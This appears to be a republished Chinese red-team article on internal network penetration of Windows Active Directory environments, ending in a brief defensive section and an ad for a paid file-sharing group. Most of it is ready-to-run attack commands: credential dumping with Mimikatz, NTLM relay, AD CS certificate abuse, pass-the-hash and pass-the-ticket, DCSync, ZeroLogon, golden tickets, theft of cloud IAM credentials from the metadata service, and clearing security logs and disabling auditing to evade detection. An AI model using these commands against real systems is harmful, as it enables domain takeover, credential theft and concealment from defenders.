红队攻防内网渗透

发布于 作者:

原文链接: https://mp.weixin.qq.com/s?__biz=MjM5OTk4MDE2MA==&mid=2655286418&idx=1&sn=19c59ac91137906ccde3b5156e683303

红队攻防内网渗透

原创 计算机与网络安全 计算机与网络安全 2025-07-10 23:57

红队在内网渗透中的核心目标是模拟高级攻击者,绕过防御体系横向移动,最终夺取关键资产(如域控、数据库、核心业务系统)。

一、前期准备

  1. 权限维持

  2. 植入Webshell/内存马(如Godzilla、Behinder)

  3. 部署隐蔽持久化后门(计划任务、服务、WMI事件订阅)

  4. 窃取凭据:

Mimikatz

(sekurlsa::logonpasswords)、

LaZagne
  1. 信息收集 
# 网络拓扑
arp -a & route print
# 主机发现
for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i | findstr "TTL"
# 域信息
nltest /domain_trusts & net group "Domain Admins" /domain

二、横向移动技术

(1)凭据中继攻击

  • NTLM中继(Responder + Impacket) 
python ntlmrelayx.py -t ldap://dc01 -smb2support --add-computer
  • Kerberos中继(KRB-RELay)
    :针对启用RBAC的服务(如Exchange)

(2)利用协议缺陷

  • LLMNR/NBT-NS投毒
    :Responder捕获NetNTLMv2哈希

  • AD CS漏洞
    (ESC1-ESC11): 

certipy req -u [email protected] -p Password1 -target ca.corp.local -template VulnTemplate

(3)Pass-the-Hash/Ticket

  • PTH(Windows)
crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:NT_HASH

  • PTT(Linux):

export KRB5CCNAME=admin.ccache
impacket-psexec domain/admin@dc01 -k -no-pass

三、权限提升路径

  1. 本地提权

  2. 利用未修补内核漏洞(CVE-2021-4034, CVE-2022-0847)

  3. 服务路径劫持:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

  1. 域内提权

  2. ACL滥用

Add-ObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity Attacker -Rights All

  • 资源委派攻击
    :约束委派->非约束委派黄金票据

  • DCSync
    :获取krbtgt哈希 

secretsdump.py corp/attacker@dc01 -just-dc

四、绕过防御机制

  1. 对抗EDR/AV

  2. 无文件攻击:PowerShell反射加载(

Invoke-ReflectivePEInjection

  1. 进程注入:
Process Hollowing

(合法进程内存替换)

  1. 签名劫持:利用微软签名的二进制执行代码(如
msbuild.exe

  1. 日志清除

  2. 清除单条日志:

wevtutil cl Security /r:EventID==4688
  1. 禁用审计策略:
auditpol /set /category:"Account Logon" /success:disable

五、关键基础设施攻击

  1. 域控攻陷

  2. ZeroLogon
    (CVE-2020-1472): 

python zerologon_tester.py dc01 192.168.1.10
secretsdump.py -no-pass dc01\[email protected] -just-dc
  • PrintNightmare
    (CVE-2021-34527):远程加载恶意DLL

2. 云环境渗透
– AWS:通过实例元数据服务窃取IAM角色凭证 

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Azure:利用Managed Identity滥用RBAC权限

六、痕迹清理与持久化

1. 黄金票据

ticketer.py -nthash krbtgt_nt_hash -domain-sid S-1-5-21-... -domain corp.local Administrator

2. DCShadow攻击
:在内存中创建伪造域控同步恶意对象

3. 隐蔽通道

1. DNS隧道(dnscat2)

  1. ICMP封装(ptunnel)

防御建议(蓝队视角)

1. **网络分段**:严格限制VLAN间通信,核心区域仅允许必要端口
2. **凭据防护**:
   - 启用LSA保护(RunAsPPL)
   - 限制NTLM使用,强制Kerberos AES加密
3. **权限最小化**:
   - 禁用域管理员本地登录非域控
   - 定期审核ACL(BloodHound扫描)
4. **深度监控**:
   - 检测异常Kerberos请求(如4624事件中LogonType=9)
   - 监控PsExec/SMBexec的父进程链(通常非explorer.exe启动)
5. **补丁管理**:优先修复ADCS漏洞、Print Spooler漏洞

红队内网渗透本质是权限传递的艺术,需结合漏洞利用、协议滥用、社会工程。蓝队需打破”已授权=可信”的思维,采用零信任架构纵深防御。

完整文件已上传至星球。

近七天上传文件列表

红队攻防内网渗透

扫码加入知识星球
网络安全攻防(HVV)

下载本篇和全套资料

红队攻防内网渗透 

HVV(红队蓝队资料、威胁情报、技战法)、渗透测试、漏洞、代码审计、APT、DDOS、勒索病毒、CTF、逆向

|
 –